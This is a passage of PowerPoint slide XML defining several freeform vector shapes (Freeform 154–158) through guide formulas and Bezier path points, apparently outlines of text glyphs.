                <a:gd name="T12" fmla="*/ 20 w 130"/>
                <a:gd name="T13" fmla="*/ 387 h 387"/>
                <a:gd name="T14" fmla="*/ 110 w 130"/>
                <a:gd name="T15" fmla="*/ 387 h 387"/>
                <a:gd name="T16" fmla="*/ 130 w 130"/>
                <a:gd name="T17" fmla="*/ 372 h 387"/>
                <a:gd name="T18" fmla="*/ 110 w 130"/>
                <a:gd name="T19" fmla="*/ 357 h 387"/>
                <a:gd name="T20" fmla="*/ 34 w 130"/>
                <a:gd name="T21" fmla="*/ 357 h 387"/>
                <a:gd name="T22" fmla="*/ 34 w 130"/>
                <a:gd name="T23" fmla="*/ 30 h 387"/>
                <a:gd name="T24" fmla="*/ 110 w 130"/>
                <a:gd name="T25" fmla="*/ 3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387">
                  <a:moveTo>
                    <a:pt x="110" y="30"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="30"/>
                    <a:pt x="130" y="30"/>
                    <a:pt x="130" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="0"/>
                    <a:pt x="118" y="0"/>
                    <a:pt x="110" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="0"/>
                    <a:pt x="0" y="4"/>
                    <a:pt x="0" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="367"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="382"/>
                    <a:pt x="3" y="387"/>
                    <a:pt x="20" y="387"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="110" y="387"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="387"/>
                    <a:pt x="130" y="387"/>
                    <a:pt x="130" y="372"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="357"/>
                    <a:pt x="118" y="357"/>
                    <a:pt x="110" y="357"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="34" y="357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110"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3" name="Freeform 154">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66A04A3D-C939-4C90-9B14-04C0E7E072B5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId50"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2957512" y="1422400"/>
              <a:ext cx="92075" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 160 w 237"/>
                <a:gd name="T1" fmla="*/ 280 h 308"/>
                <a:gd name="T2" fmla="*/ 180 w 237"/>
                <a:gd name="T3" fmla="*/ 305 h 308"/>
                <a:gd name="T4" fmla="*/ 217 w 237"/>
                <a:gd name="T5" fmla="*/ 305 h 308"/>
                <a:gd name="T6" fmla="*/ 237 w 237"/>
                <a:gd name="T7" fmla="*/ 289 h 308"/>
                <a:gd name="T8" fmla="*/ 217 w 237"/>
                <a:gd name="T9" fmla="*/ 274 h 308"/>
                <a:gd name="T10" fmla="*/ 195 w 237"/>
                <a:gd name="T11" fmla="*/ 274 h 308"/>
                <a:gd name="T12" fmla="*/ 195 w 237"/>
                <a:gd name="T13" fmla="*/ 21 h 308"/>
                <a:gd name="T14" fmla="*/ 175 w 237"/>
                <a:gd name="T15" fmla="*/ 0 h 308"/>
                <a:gd name="T16" fmla="*/ 138 w 237"/>
                <a:gd name="T17" fmla="*/ 0 h 308"/>
                <a:gd name="T18" fmla="*/ 118 w 237"/>
                <a:gd name="T19" fmla="*/ 16 h 308"/>
                <a:gd name="T20" fmla="*/ 138 w 237"/>
                <a:gd name="T21" fmla="*/ 30 h 308"/>
                <a:gd name="T22" fmla="*/ 160 w 237"/>
                <a:gd name="T23" fmla="*/ 30 h 308"/>
                <a:gd name="T24" fmla="*/ 160 w 237"/>
                <a:gd name="T25" fmla="*/ 109 h 308"/>
                <a:gd name="T26" fmla="*/ 102 w 237"/>
                <a:gd name="T27" fmla="*/ 87 h 308"/>
                <a:gd name="T28" fmla="*/ 0 w 237"/>
                <a:gd name="T29" fmla="*/ 198 h 308"/>
                <a:gd name="T30" fmla="*/ 97 w 237"/>
                <a:gd name="T31" fmla="*/ 308 h 308"/>
                <a:gd name="T32" fmla="*/ 160 w 237"/>
                <a:gd name="T33" fmla="*/ 280 h 308"/>
                <a:gd name="T34" fmla="*/ 160 w 237"/>
                <a:gd name="T35" fmla="*/ 173 h 308"/>
                <a:gd name="T36" fmla="*/ 160 w 237"/>
                <a:gd name="T37" fmla="*/ 208 h 308"/>
                <a:gd name="T38" fmla="*/ 99 w 237"/>
                <a:gd name="T39" fmla="*/ 277 h 308"/>
                <a:gd name="T40" fmla="*/ 34 w 237"/>
                <a:gd name="T41" fmla="*/ 198 h 308"/>
                <a:gd name="T42" fmla="*/ 104 w 237"/>
                <a:gd name="T43" fmla="*/ 117 h 308"/>
                <a:gd name="T44" fmla="*/ 160 w 237"/>
                <a:gd name="T45" fmla="*/ 17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7" h="308">
                  <a:moveTo>
                    <a:pt x="160" y="280"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="298"/>
                    <a:pt x="160" y="305"/>
                    <a:pt x="180" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="217" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="305"/>
                    <a:pt x="237" y="305"/>
                    <a:pt x="237" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="274"/>
                    <a:pt x="224" y="274"/>
                    <a:pt x="217" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="195" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="5"/>
                    <a:pt x="192" y="0"/>
                    <a:pt x="175" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="138" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="0"/>
                    <a:pt x="118" y="0"/>
                    <a:pt x="118" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="30"/>
                    <a:pt x="131" y="30"/>
                    <a:pt x="138" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="160" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="109"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="95"/>
                    <a:pt x="123" y="87"/>
                    <a:pt x="102" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="87"/>
                    <a:pt x="0" y="134"/>
                    <a:pt x="0" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="259"/>
                    <a:pt x="45" y="308"/>
                    <a:pt x="97" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="308"/>
                    <a:pt x="146" y="294"/>
                    <a:pt x="160" y="280"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="160" y="173"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="160" y="208"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="236"/>
                    <a:pt x="138" y="277"/>
                    <a:pt x="99" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="277"/>
                    <a:pt x="34" y="242"/>
                    <a:pt x="34" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="150"/>
                    <a:pt x="69" y="117"/>
                    <a:pt x="104" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="117"/>
                    <a:pt x="160" y="145"/>
                    <a:pt x="160" y="17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4" name="Freeform 155">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{165FBA5E-52E0-469C-BC42-2F13A23AD0FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId51"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3062287" y="1455738"/>
              <a:ext cx="79375" cy="88900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 125 h 223"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 223"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 223"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 112 h 223"/>
                <a:gd name="T8" fmla="*/ 114 w 204"/>
                <a:gd name="T9" fmla="*/ 223 h 223"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 223"/>
                <a:gd name="T12" fmla="*/ 186 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 223"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 223"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 223"/>
                <a:gd name="T18" fmla="*/ 35 w 204"/>
                <a:gd name="T19" fmla="*/ 125 h 223"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 125 h 223"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 95 h 223"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 31 h 223"/>
                <a:gd name="T26" fmla="*/ 168 w 204"/>
                <a:gd name="T27" fmla="*/ 95 h 223"/>
                <a:gd name="T28" fmla="*/ 36 w 204"/>
                <a:gd name="T29" fmla="*/ 9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3">
                  <a:moveTo>
                    <a:pt x="184" y="125"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="125"/>
                    <a:pt x="204" y="125"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="50" y="223"/>
                    <a:pt x="114" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="223"/>
                    <a:pt x="204" y="178"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="189" y="151"/>
                    <a:pt x="186" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="151"/>
                    <a:pt x="173" y="153"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="188"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="192"/>
                    <a:pt x="43" y="167"/>
                    <a:pt x="35" y="125"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="125"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="95"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="72" y="31"/>
                    <a:pt x="107" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="31"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="168" y="95"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="36" y="9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5" name="Freeform 156">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C624FFE2-FB02-4B15-85E1-8334777C6E4E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId52"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3167062" y="1455738"/>
              <a:ext cx="73025" cy="88900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 193"/>
                <a:gd name="T1" fmla="*/ 93 h 223"/>
                <a:gd name="T2" fmla="*/ 78 w 193"/>
                <a:gd name="T3" fmla="*/ 87 h 223"/>
                <a:gd name="T4" fmla="*/ 30 w 193"/>
                <a:gd name="T5" fmla="*/ 59 h 223"/>
                <a:gd name="T6" fmla="*/ 93 w 193"/>
                <a:gd name="T7" fmla="*/ 31 h 223"/>
                <a:gd name="T8" fmla="*/ 143 w 193"/>
                <a:gd name="T9" fmla="*/ 59 h 223"/>
                <a:gd name="T10" fmla="*/ 160 w 193"/>
                <a:gd name="T11" fmla="*/ 76 h 223"/>
                <a:gd name="T12" fmla="*/ 178 w 193"/>
                <a:gd name="T13" fmla="*/ 55 h 223"/>
                <a:gd name="T14" fmla="*/ 178 w 193"/>
                <a:gd name="T15" fmla="*/ 21 h 223"/>
                <a:gd name="T16" fmla="*/ 163 w 193"/>
                <a:gd name="T17" fmla="*/ 0 h 223"/>
                <a:gd name="T18" fmla="*/ 148 w 193"/>
                <a:gd name="T19" fmla="*/ 11 h 223"/>
                <a:gd name="T20" fmla="*/ 94 w 193"/>
                <a:gd name="T21" fmla="*/ 0 h 223"/>
                <a:gd name="T22" fmla="*/ 0 w 193"/>
                <a:gd name="T23" fmla="*/ 59 h 223"/>
                <a:gd name="T24" fmla="*/ 98 w 193"/>
                <a:gd name="T25" fmla="*/ 121 h 223"/>
                <a:gd name="T26" fmla="*/ 162 w 193"/>
                <a:gd name="T27" fmla="*/ 157 h 223"/>
                <a:gd name="T28" fmla="*/ 98 w 193"/>
                <a:gd name="T29" fmla="*/ 192 h 223"/>
                <a:gd name="T30" fmla="*/ 35 w 193"/>
                <a:gd name="T31" fmla="*/ 148 h 223"/>
                <a:gd name="T32" fmla="*/ 17 w 193"/>
                <a:gd name="T33" fmla="*/ 133 h 223"/>
                <a:gd name="T34" fmla="*/ 0 w 193"/>
                <a:gd name="T35" fmla="*/ 154 h 223"/>
                <a:gd name="T36" fmla="*/ 0 w 193"/>
                <a:gd name="T37" fmla="*/ 202 h 223"/>
                <a:gd name="T38" fmla="*/ 15 w 193"/>
                <a:gd name="T39" fmla="*/ 223 h 223"/>
                <a:gd name="T40" fmla="*/ 33 w 193"/>
                <a:gd name="T41" fmla="*/ 204 h 223"/>
                <a:gd name="T42" fmla="*/ 98 w 193"/>
                <a:gd name="T43" fmla="*/ 223 h 223"/>
                <a:gd name="T44" fmla="*/ 193 w 193"/>
                <a:gd name="T45" fmla="*/ 157 h 223"/>
                <a:gd name="T46" fmla="*/ 112 w 193"/>
                <a:gd name="T47" fmla="*/ 9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3">
                  <a:moveTo>
                    <a:pt x="112" y="93"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="91"/>
                    <a:pt x="91" y="89"/>
                    <a:pt x="78" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="85"/>
                    <a:pt x="30" y="79"/>
                    <a:pt x="30" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="46"/>
                    <a:pt x="46" y="31"/>
                    <a:pt x="93" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="31"/>
                    <a:pt x="142" y="46"/>
                    <a:pt x="143" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="67"/>
                    <a:pt x="145" y="76"/>
                    <a:pt x="160" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="76"/>
                    <a:pt x="178" y="65"/>
                    <a:pt x="178" y="55"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="178" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="13"/>
                    <a:pt x="178" y="0"/>
                    <a:pt x="163" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="149" y="7"/>
                    <a:pt x="148" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="0"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="94" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="0"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="105"/>
                    <a:pt x="52" y="114"/>
                    <a:pt x="98" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="125"/>
                    <a:pt x="162" y="131"/>
                    <a:pt x="162" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="176"/>
                    <a:pt x="144" y="192"/>
                    <a:pt x="98" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="192"/>
                    <a:pt x="47" y="187"/>
                    <a:pt x="35" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="139"/>
                    <a:pt x="30" y="133"/>
                    <a:pt x="17" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="133"/>
                    <a:pt x="0" y="144"/>
                    <a:pt x="0" y="154"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210"/>
                    <a:pt x="0" y="223"/>
                    <a:pt x="15" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="223"/>
                    <a:pt x="27" y="222"/>
                    <a:pt x="33" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="222"/>
                    <a:pt x="84" y="223"/>
                    <a:pt x="98" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="223"/>
                    <a:pt x="193" y="181"/>
                    <a:pt x="193" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="106"/>
                    <a:pt x="128" y="95"/>
                    <a:pt x="112" y="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6" name="Freeform 157">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B554F620-A816-4157-9E49-A66EC6D4B5D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId53"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3267075" y="1455738"/>
              <a:ext cx="76200" cy="88900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 165 h 223"/>
                <a:gd name="T2" fmla="*/ 178 w 196"/>
                <a:gd name="T3" fmla="*/ 151 h 223"/>
                <a:gd name="T4" fmla="*/ 162 w 196"/>
                <a:gd name="T5" fmla="*/ 162 h 223"/>
                <a:gd name="T6" fmla="*/ 112 w 196"/>
                <a:gd name="T7" fmla="*/ 192 h 223"/>
                <a:gd name="T8" fmla="*/ 34 w 196"/>
                <a:gd name="T9" fmla="*/ 112 h 223"/>
                <a:gd name="T10" fmla="*/ 115 w 196"/>
                <a:gd name="T11" fmla="*/ 31 h 223"/>
                <a:gd name="T12" fmla="*/ 145 w 196"/>
                <a:gd name="T13" fmla="*/ 35 h 223"/>
                <a:gd name="T14" fmla="*/ 167 w 196"/>
                <a:gd name="T15" fmla="*/ 60 h 223"/>
                <a:gd name="T16" fmla="*/ 190 w 196"/>
                <a:gd name="T17" fmla="*/ 37 h 223"/>
                <a:gd name="T18" fmla="*/ 115 w 196"/>
                <a:gd name="T19" fmla="*/ 0 h 223"/>
                <a:gd name="T20" fmla="*/ 0 w 196"/>
                <a:gd name="T21" fmla="*/ 112 h 223"/>
                <a:gd name="T22" fmla="*/ 109 w 196"/>
                <a:gd name="T23" fmla="*/ 223 h 223"/>
                <a:gd name="T24" fmla="*/ 196 w 196"/>
                <a:gd name="T25" fmla="*/ 16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6" h="223">
                  <a:moveTo>
                    <a:pt x="196" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="151"/>
                    <a:pt x="181" y="151"/>
                    <a:pt x="178" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="151"/>
                    <a:pt x="165" y="152"/>
                    <a:pt x="162" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="169"/>
                    <a:pt x="149" y="192"/>
                    <a:pt x="112" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="192"/>
                    <a:pt x="34" y="157"/>
                    <a:pt x="34" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="88"/>
                    <a:pt x="48" y="31"/>
                    <a:pt x="115" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="31"/>
                    <a:pt x="145" y="31"/>
                    <a:pt x="145" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="53"/>
                    <a:pt x="155" y="60"/>
                    <a:pt x="167" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="60"/>
                    <a:pt x="190" y="51"/>
                    <a:pt x="190" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="115" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="0" y="68"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="47" y="223"/>
                    <a:pt x="109" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="223"/>
                    <a:pt x="196" y="174"/>
                    <a:pt x="196" y="16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7" name="Freeform 158">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAFC5389-EDC6-4A6C-9C8D-54C2C1EA030F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId54"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3360737" y="1457325"/>
              <a:ext cx="87313" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 95 w 227"/>
                <a:gd name="T1" fmla="*/ 125 h 218"/>
                <a:gd name="T2" fmla="*/ 184 w 227"/>
                <a:gd name="T3" fmla="*/ 30 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 227"/>
                <a:gd name="T5" fmla="*/ 52 h 218"/>
                <a:gd name="T6" fmla="*/ 227 w 227"/>
                <a:gd name="T7" fmla="*/ 31 h 218"/>
                <a:gd name="T8" fmla="*/ 179 w 227"/>
                <a:gd name="T9" fmla="*/ 0 h 218"/>
                <a:gd name="T10" fmla="*/ 95 w 227"/>
                <a:gd name="T11" fmla="*/ 40 h 218"/>
                <a:gd name="T12" fmla="*/ 95 w 227"/>
                <a:gd name="T13" fmla="*/ 23 h 218"/>
                <a:gd name="T14" fmla="*/ 75 w 227"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 20 w 227"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 227"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 20 w 227"/>
                <a:gd name="T21" fmla="*/ 33 h 218"/>
                <a:gd name="T22" fmla="*/ 60 w 227"/>
                <a:gd name="T23" fmla="*/ 33 h 218"/>
                <a:gd name="T24" fmla="*/ 60 w 227"/>
                <a:gd name="T25" fmla="*/ 187 h 218"/>
                <a:gd name="T26" fmla="*/ 20 w 227"/>
                <a:gd name="T27" fmla="*/ 187 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 227"/>
                <a:gd name="T29" fmla="*/ 202 h 218"/>
                <a:gd name="T30" fmla="*/ 20 w 227"/>
                <a:gd name="T31" fmla="*/ 218 h 218"/>
                <a:gd name="T32" fmla="*/ 150 w 227"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 170 w 227"/>
                <a:gd name="T35" fmla="*/ 203 h 218"/>
                <a:gd name="T36" fmla="*/ 150 w 227"/>
                <a:gd name="T37" fmla="*/ 187 h 218"/>
                <a:gd name="T38" fmla="*/ 95 w 227"/>
                <a:gd name="T39" fmla="*/ 187 h 218"/>
                <a:gd name="T40" fmla="*/ 95 w 227"/>
                <a:gd name="T41" fmla="*/ 125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7" h="218">
                  <a:moveTo>
                    <a:pt x="95" y="125"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="78"/>
                    <a:pt x="124" y="30"/>
                    <a:pt x="184" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="42"/>
                    <a:pt x="193" y="52"/>
                    <a:pt x="206" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="52"/>
                    <a:pt x="227" y="44"/>
                    <a:pt x="227" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="21"/>
                    <a:pt x="221" y="0"/>
                    <a:pt x="179" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="0"/>
                    <a:pt x="122" y="9"/>
                    <a:pt x="95" y="40"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="23"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="8"/>
                    <a:pt x="92" y="3"/>
                    <a:pt x="75" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="12" y="33"/>
                    <a:pt x="20" y="33"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="60" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="187"/>
                    <a:pt x="0" y="187"/>
                    <a:pt x="0" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="12" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="218"/>
                    <a:pt x="170" y="218"/>
                    <a:pt x="170" y="203"/>
